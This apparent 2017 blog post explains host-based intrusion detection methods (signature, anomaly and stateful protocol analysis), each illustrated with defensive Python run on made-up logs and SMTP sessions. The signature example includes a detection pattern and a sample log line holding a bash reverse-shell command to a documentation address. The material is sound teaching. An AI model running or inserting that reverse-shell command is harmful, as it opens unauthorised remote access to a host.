With cyber attacks and breaches all over the news, building up your own company’s security may be on your mind. We know today that a firewall is not enough and should not be the only control we rely on. Security is now built in layers, and an Intrusion Detection System (IDS) is one of those layers: an application that monitors a network or a system for suspicious activity and raises alerts, typically deployed alongside a firewall rather than in place of it. One type of IDS is a Host-based Intrusion Detection System (HIDS), a particularly versatile form of IDS.
As the name suggests, a HIDS resides on a single host, monitoring and reporting on that system’s configuration, logs, and application activity. This added layer means that activity which gets past your firewall is still seen: a HIDS cannot stop it on its own, but it can tell you that it happened and where. A HIDS can use several detection methods, chiefly signature detection, anomaly detection, and stateful protocol analysis. Understanding these methods helps in deciding whether and how a HIDS fits within an organization.
The first method is signature detection, also known as pattern matching or misuse detection. It detects known attacks by the specific actions they perform; those actions, encoded as patterns, are the signatures. Because it only looks for traffic and behavior that match the signatures of attacks already catalogued, the signature set must be kept up to date: a new attack, or an old one altered enough to no longer match its pattern, goes undetected. Within those limits, signature detection has a low false positive rate and a high true positive rate for known attacks.
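As an added example (not code from the original post or any particular HIDS product), here is the core of signature detection run over a few constructed log lines: each signature is a pattern paired with a name, and every line is tested against the whole set. The signatures, host names, addresses and log lines are all made up for the illustration.

```python
import re
from dataclasses import dataclass


# Hypothetical signature set, constructed for this example. Each signature pairs a
# compiled pattern with a name, the way a rule file pairs a pattern with an alert.
@dataclass(frozen=True)
class Signature:
    name: str
    pattern: re.Pattern


SIGNATURES = [
    Signature("ssh-invalid-user",
              re.compile(r"sshd\[\d+\]: Invalid user (\S+) from (\d+\.\d+\.\d+\.\d+)")),
    Signature("sudo-auth-failure",
              re.compile(r"sudo: .*authentication failure")),
    Signature("reverse-shell-cmdline",
              re.compile(r"bash -i >& /dev/tcp/")),
]


def match_signatures(lines, signatures=SIGNATURES):
    """Return (line_number, signature_name) for every line matching a known pattern.

    A line that matches several signatures yields several hits; a line that
    matches none is silently ignored, which is exactly the blind spot of the method.
    """
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for sig in signatures:
            if sig.pattern.search(line):
                hits.append((lineno, sig.name))
    return hits


# Constructed sample log lines (not real captures).
SAMPLE_LOG = [
    "Jun 27 10:01:02 web01 sshd[1234]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2",
    "Jun 27 10:01:09 web01 sshd[1240]: Invalid user admin from 203.0.113.9 port 40022",
    "Jun 27 10:02:15 web01 sudo: pam_unix(sudo:auth): authentication failure; logname=deploy uid=1001",
    "Jun 27 10:03:40 web01 auditd[55]: execve: bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
    "Jun 27 10:04:00 web01 cron[77]: (root) CMD (run-parts /etc/cron.hourly)",
]

if __name__ == "__main__":
    for lineno, name in match_signatures(SAMPLE_LOG):
        print(f"line {lineno}: {name}")
```

The three malicious lines are caught and the two benign ones are not, which is the low false positive rate the method is known for. The same run also shows its weakness: a variant of the last line that invokes `sh` instead of `bash`, or builds the `/dev/tcp` path from a variable, matches nothing, so the signature set only stays useful while someone keeps adding the variants.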
The second method is anomaly detection, also called statistical detection. Here you first establish a baseline of normal usage patterns on your system; anything that deviates widely from that baseline is then flagged as a possible intrusion. Anomaly detection can cover user behavior as well: if someone in one department begins accessing files that have nothing to do with their job, it can alert administrators. This is what lets you catch new intrusions for which no signature exists yet. The same idea is used for other business purposes too; according to Datalya, anomalies in business data fall into three categories:
1. Point anomalies
A single data instance is anomalous because it lies too far from the rest.
2. Contextual anomalies
Whether an instance is abnormal depends on its context, such as the time at which it occurs. This type is common in time-series data.
3. Collective anomalies
A set of related data instances is anomalous as a group, even though no single instance in it looks abnormal on its own.
Anomaly detection does carry a higher false positive rate, since legitimate but unusual activity deviates from the baseline just as an intrusion does, but paired with signature detection it makes for a strong defense.
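To make the three categories and the department example concrete, here is an added example (not from the original post, and not any product's implementation) that learns a per-user baseline from constructed file-access events and then scores new events for a point anomaly (a directory the user has never touched), a contextual anomaly (a usual file at an unusual hour) and a collective anomaly (a burst of reads that are each ordinary). The user, paths, times, burst threshold and window are all assumptions made for the illustration.

```python
from collections import defaultdict, deque

# Constructed file-access events (not real data): (timestamp in seconds since
# midnight, user, path). The baseline is learned from a day of ordinary activity
# and new events are then scored against it.
BASELINE_EVENTS = [
    (t, "alice", f"/srv/finance/q{i % 4}/ledger.xlsx")
    for i, t in enumerate(range(9 * 3600, 17 * 3600, 900))  # 09:00-17:00, every 15 min
]

NEW_EVENTS = [
    (3 * 3600, "alice", "/srv/finance/q2/ledger.xlsx"),       # contextual: usual file, 03:00
    (10 * 3600 + 5, "alice", "/srv/finance/q1/ledger.xlsx"),  # normal
    (11 * 3600, "alice", "/srv/hr/salaries.xlsx"),            # point: directory never seen
] + [
    (14 * 3600 + s, "alice", f"/srv/finance/q3/doc{s}.xlsx")  # collective: 15 reads in 30 s
    for s in range(0, 30, 2)
]


def top_dir(path):
    """Reduce /srv/finance/q1/ledger.xlsx to /srv/finance (the 'department' share)."""
    return "/".join(path.split("/")[:3])


def build_baseline(events):
    """Per-user profile of the directories and hours seen during normal activity."""
    profile = defaultdict(lambda: {"dirs": set(), "hours": set()})
    for t, user, path in events:
        profile[user]["dirs"].add(top_dir(path))
        profile[user]["hours"].add((t // 3600) % 24)
    return profile


def detect(events, profile, burst_threshold=10, window=60):
    """Score events against the profile; return (time, user, reason, path) alerts.

    Three checks map to the three anomaly categories: a directory outside the
    user's baseline (point), a usual directory at an unusual hour (contextual),
    and a run of accesses that is only abnormal as a group (collective).
    burst_threshold and window are assumed tuning values, not measured ones.
    """
    alerts = []
    recent = defaultdict(deque)  # per-user timestamps inside the sliding window
    for t, user, path in sorted(events):
        p = profile.get(user)
        if p is None:
            alerts.append((t, user, "point: user has no baseline", path))
            continue
        if top_dir(path) not in p["dirs"]:
            alerts.append((t, user, "point: directory outside baseline", path))
        if (t // 3600) % 24 not in p["hours"]:
            alerts.append((t, user, "contextual: access outside usual hours", path))
        q = recent[user]
        q.append(t)
        while t - q[0] > window:
            q.popleft()
        if len(q) == burst_threshold:  # fire once, when the burst first crosses the line
            alerts.append((t, user, f"collective: {burst_threshold} accesses within {window}s", path))
    return alerts


if __name__ == "__main__":
    for alert in detect(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(alert)
```

Running it produces exactly three alerts, one per category, and the 10:00 access to a familiar ledger produces none. The false positive problem is visible in the same code: a legitimate late-night month-end close would trip the contextual check just as the 03:00 event does, which is why these alerts are best correlated with signature hits rather than acted on alone.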
Stateful Protocol Analysis Detection
The stateful protocol analysis method identifies deviations in protocol state, much like anomaly detection does. It differs in that it relies on predetermined universal profiles of benign protocol behavior, developed by the IDS vendor from the protocol standards or specifications, rather than on a baseline learned from your own system. Because the profiles are built from the specifications, implementations that deviate from the standard in too many ways make it difficult for the system to track and analyze protocol states correctly. With those profiles it can identify an unexpected sequence of commands and, by keeping track of each session’s state, can do so at both the network layer and the application layer. Two caveats a practitioner should weigh: tracking state for every session is resource intensive, and an attack that respects the protocol, for instance a malicious payload delivered in a perfectly well-formed message, is not a protocol deviation and will not be flagged by this method.
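As an added illustration (not from the original post and not any vendor’s profile), here is a small stateful protocol analyzer for the client side of an SMTP session. The allowed command order (greeting, then MAIL, then one or more RCPT, then DATA) and the 512-octet command-line limit are taken from RFC 5321; the two sessions it is run against are constructed for the example, and the second one contains a DATA command issued before any recipient and a MAIL argument far longer than the specification allows.

```python
# States of one SMTP session, following the command sequence RFC 5321 specifies.
INIT, GREETED, MAIL, RCPT, DATA = "INIT", "GREETED", "MAIL", "RCPT", "DATA"
MAX_CMD_LINE = 512  # RFC 5321 section 4.5.3.1.6: command line limit, including CRLF

# verb -> (states in which the verb is expected, state after it is accepted)
TRANSITIONS = {
    "HELO": ({INIT, GREETED, MAIL, RCPT}, GREETED),
    "EHLO": ({INIT, GREETED, MAIL, RCPT}, GREETED),
    "MAIL": ({GREETED}, MAIL),
    "RCPT": ({MAIL, RCPT}, RCPT),
    "DATA": ({RCPT}, DATA),
}
STATELESS = {"NOOP", "QUIT"}  # allowed in any state, state unchanged


def analyze_session(lines):
    """Run one client's command lines through the state machine; return (line, reason) alerts.

    Lines are assumed to have CRLF already stripped. While in DATA the message
    body is opaque to the protocol check, so a malicious payload delivered in a
    well-formed session is not a deviation and is not reported (the method's limit).
    """
    state = INIT
    alerts = []
    for n, raw in enumerate(lines, start=1):
        if state == DATA:
            if raw == ".":          # end of message body
                state = GREETED
            continue
        if len(raw) + 2 > MAX_CMD_LINE:  # +2 restores the stripped CRLF
            alerts.append((n, "command line exceeds RFC 5321 limit"))
        verb = raw.split(" ", 1)[0].upper()
        if verb in STATELESS:
            if verb == "QUIT":
                break
            continue
        if verb == "RSET":          # allowed anywhere; abandons the current transaction
            state = INIT if state == INIT else GREETED
            continue
        rule = TRANSITIONS.get(verb)
        if rule is None:
            alerts.append((n, f"unknown command {verb}"))
            continue
        allowed, next_state = rule
        if state not in allowed:
            alerts.append((n, f"{verb} not expected in state {state}"))
            continue                # a server would reply 503; the state does not advance
        state = next_state
    return alerts


# Constructed sessions (not captured traffic). The first is well-formed.
GOOD_SESSION = [
    "EHLO client.example",
    "MAIL FROM:<alice@example.org>",
    "RCPT TO:<bob@example.net>",
    "DATA",
    "Subject: hi",
    "",
    "hello",
    ".",
    "QUIT",
]
# DATA before any RCPT, then a MAIL argument far beyond the specified line limit.
BAD_SESSION = [
    "EHLO client.example",
    "DATA",
    "MAIL FROM:<" + "a" * 600 + "@example.org>",
    "RCPT TO:<bob@example.net>",
    "QUIT",
]

if __name__ == "__main__":
    print(analyze_session(GOOD_SESSION))
    print(analyze_session(BAD_SESSION))
```

The good session yields no alerts; the bad one yields two, one for the out-of-order DATA and one for the overlong command line, without any signature for a specific attack being needed. Note what the analyzer had to keep: a state variable per session, which is the per-connection bookkeeping that makes this method heavier than a stateless pattern match.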
Knowing how a host-based IDS detects gives you more than an understanding of how it works; it tells you how it can work within your business. Paired with a firewall and using the detection methods it offers, a HIDS is a strong addition to protecting your company from malicious or anomalous activity on the host itself.
June 27, 2017